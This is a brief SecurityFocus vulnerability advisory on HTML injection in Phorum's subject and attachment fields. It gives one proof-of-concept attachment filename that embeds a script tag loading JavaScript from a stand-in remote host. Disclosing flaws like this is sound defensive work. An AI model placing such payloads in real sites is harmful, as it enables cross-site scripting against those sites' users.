Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Phorum Multiple Subject and Attachment HTML Injection Vulnerabilities

No exploit is required.

The following proof of concept demonstrates a filename suitable for an attachment:
test<script language='Javascript' src='http://www.example.com/test.js'>.txt







 

Privacy Statement
Copyright 2008, SecurityFocus